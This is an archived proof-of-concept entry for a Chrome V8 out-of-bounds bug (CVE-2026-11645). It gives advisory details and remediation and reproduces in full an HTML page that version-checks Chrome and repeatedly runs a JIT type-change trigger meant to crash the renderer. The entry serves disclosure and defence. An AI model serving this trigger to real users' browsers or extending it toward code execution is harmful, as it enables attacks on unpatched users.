PoC Archive PoC Archive
High CVE-2026-11645 unpatched

Google Chromium V8 Out-of-Bounds Read/Write — Crash PoC (CVE-2026-11645)

by Google/Chromium (advisory); 0xBlackash (crash PoC) · 2026-07-01

CVSS 8.8/10
Severity
High
CVE
CVE-2026-11645
Category
web
Affected product
Google Chrome / Chromium — V8 JavaScript and WebAssembly engine
Affected versions
Chrome prior to 149.0.7827.103
Disclosed
2026-07-01
Patch status
unpatched

Metadata

FieldValue
Date Added2026-07-01
Last Updated2026-06
Author / ResearcherGoogle/Chromium (advisory); 0xBlackash (crash PoC)
CVE / AdvisoryCVE-2026-11645
Categoryweb
SeverityHigh
CVSS Score8.8 (CVSSv3)
StatusIncomplete PoC (crash only — no confirmed public RCE chain)
Tagsbrowser, chrome, v8, javascript, turbofan, out-of-bounds, memory-corruption, zero-day, incomplete-poc, active-exploitation
RelatedN/A

Affected Target

FieldValue
Software / SystemGoogle Chrome / Chromium — V8 JavaScript and WebAssembly engine
Versions AffectedChrome prior to 149.0.7827.103
Language / PlatformHTML/JavaScript
Authentication RequiredNo
Network Access RequiredNo (local file) — real-world delivery would be via a crafted web page

Summary

CVE-2026-11645 is a high-severity out-of-bounds read/write vulnerability in V8, the JavaScript/WebAssembly engine used by Chrome and other Chromium-based browsers. The bug is rooted in V8’s TurboFan optimizer: incorrect range analysis for loop-modified or bitwise-manipulated values can cause the compiler to wrongly eliminate runtime bounds checks on array accesses, and a related trigger involves stale ElementsKind assumptions after array layout transitions. Google has confirmed exploitation exists in the wild but has not published root-cause implementation details, and no fully weaponized public RCE PoC has been found. This repository is a browser-crash / instability demonstrator only — it identifies vulnerable Chrome versions and triggers a repeated class-extension-with-type-change pattern intended to induce V8 memory corruption, but it does not include a working sandbox-escape or code-execution chain.


Vulnerability Details

Root Cause

TurboFan’s range analysis for loop-modified/bitwise-manipulated values can incorrectly eliminate bounds checks on typed/regular array accesses, and stale ElementsKind assumptions after an array’s backing-store layout transitions can compound the issue, producing out-of-bounds reads/writes in JIT-compiled code.

Attack Vector (as publicly understood — not fully reproduced by this PoC)

  1. Victim loads a crafted web page in a vulnerable Chrome build.
  2. JavaScript on the page trains TurboFan via repeated execution to JIT-optimize a function with the vulnerable range-analysis pattern.
  3. A subsequent call with attacker-controlled values causes the JIT to skip a bounds check, corrupting adjacent heap memory.
  4. Full exploitation would require further primitives (addr-of/fake-obj, sandbox escape) not present in this PoC.

Impact

Confirmed in-the-wild exploitation per Google, believed to enable code execution inside the browser sandbox. This archived PoC demonstrates browser instability/crash only.


Environment / Lab Setup

Target:   Google Chrome < 149.0.7827.103
Attacker: Any HTTP server or local file:// delivery of CVE-2026-11645.html

Proof of Concept

PoC File

See CVE-2026-11645.html in this folder.

Open the HTML file in a vulnerable Chrome build; it includes a version-check button and a trigger button. The trigger routine repeatedly instantiates a class extending Function while changing a property value from an integer to a floating-point number, attempting to induce the TurboFan range-analysis bug and crash the renderer.

This PoC demonstrates instability/crash behavior only — it is not a working code-execution exploit.


Detection & Indicators of Compromise

Signs of compromise:

  • Chrome crash reports referencing V8/TurboFan in the stack trace
  • Endpoint EDR alerts for renderer-process anomalies following web browsing

Remediation

ActionDetail
Primary fixUpdate Chrome to 149.0.7827.103 or later
MitigationEnable/verify auto-update; consider Site Isolation and sandboxing hardening in managed environments

References


Notes

Auto-ingested from https://github.com/0xBlackash/CVE-2026-11645 on 2026-07-01. Caution: Google has not disclosed root-cause exploitation details for this actively-exploited bug, and this is the only public repository found for the CVE. It is a crash/instability demonstrator, not a validated weaponized exploit — treat any claims of a full sandbox-escape/RCE PoC for this CVE with skepticism until corroborated by a named security researcher or vendor writeup.

cve-2026-11645.html
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CVE-2026-11645 Test PoC - Chrome 148</title>
    <style>
        body {
            font-family: monospace;
            background: #0f0f1a;
            color: #00ff00;
            padding: 20px;
            margin: 0;
        }
        h1 { color: #ff4444; }
        button {
            padding: 15px 25px;
            font-size: 18px;
            margin: 10px;
            cursor: pointer;
            background: #e94560;
            color: white;
            border: none;
            border-radius: 6px;
        }
        button:hover { background: #ff6b6b; }
        #log {
            background: #1a1a2a;
            padding: 20px;
            margin-top: 20px;
            white-space: pre-wrap;
            max-height: 80vh;
            overflow-y: auto;
            border: 1px solid #333;
            font-size: 15px;
        }
        .info { color: #00ccff; }
        .success { color: #00ff88; }
        .warning { color: #ffaa00; }
    </style>
</head>
<body>
    <h1>CVE-2026-11645 - V8 OOB Test PoC</h1>
    <p><strong>Target:</strong> Chrome 148 (Vulnerable)</p>
    <p>Click "Run Auto Stress Test" for best results.</p>

    <button onclick="checkVersion()">🔍 Check Version</button>
    <button onclick="runStrongTest()">🚀 Trigger Strong Test (5x)</button>
    <button onclick="runAutoTest()">🔄 Run Auto Stress Test (Recommended)</button>
    <button onclick="clearLog()">Clear Log</button>

    <div id="log"></div>

    <script>
        const logEl = document.getElementById('log');

        function log(msg, type = 'info') {
            const ts = new Date().toLocaleTimeString();
            let prefix = '';
            if (type === 'success') prefix = '✅ ';
            else if (type === 'warning') prefix = '⚠️ ';
            else if (type === 'error') prefix = '❌ ';
            
            const line = `[${ts}] ${prefix}${msg}\n`;
            logEl.textContent += line;
            console.log(msg);
            logEl.scrollTop = logEl.scrollHeight;
        }

        function checkVersion() {
            const ua = navigator.userAgent;
            const match = ua.match(/Chrome\/(\d+)/);
            if (match) {
                const ver = parseInt(match[1]);
                log(`Browser: ${match[0]}`, 'info');
                if (ver < 149) {
                    log("⚠️ LIKELY VULNERABLE (before 149.0.7827.103)", 'warning');
                } else {
                    log("✅ Patched version detected", 'success');
                }
            } else {
                log("Could not detect Chrome version", 'error');
            }
        }

        function trigger() {
            try {
                let value = 2;
                class C extends Function {
                    ['AA'] = value;
                }
                // Training phase
                for (let i = 0; i < 800; i++) {
                    new C("'use strict'");
                }
                // Type confusion trigger
                value = 1.1;
                for (let i = 0; i < 1500; i++) {
                    new C("'use strict'");
                }
            } catch (e) {
                log("Trigger error: " + e.message, 'error');
            }
        }

        function runStrongTest() {
            log("=== Starting Strong Trigger (5 runs) ===", 'warning');
            for (let run = 0; run < 5; run++) {
                trigger();
                log(`Strong trigger run ${run + 1}/5 completed`, 'success');
            }
            log("=== Strong test finished - Check if tab crashed ===", 'info');
        }

        function runAutoTest() {
            log("=== AUTO STRESS TEST STARTED (8 cycles) ===", 'warning');
            let count = 0;
            const interval = setInterval(() => {
                count++;
                runStrongTest();
                if (count >= 8) {
                    clearInterval(interval);
                    log("Auto stress test completed.", 'info');
                }
            }, 700);
        }

        function clearLog() {
            logEl.textContent = '';
            log("Log cleared.", 'info');
        }

        // Auto start
        window.onload = function() {
            checkVersion();
            log("✅ CVE-2026-11645 Test PoC Ready", 'success');
            log("Tip: Use 'Run Auto Stress Test' for maximum chance of triggering crash on vulnerable Chrome 148", 'info');
        };
    </script>
</body>
</html>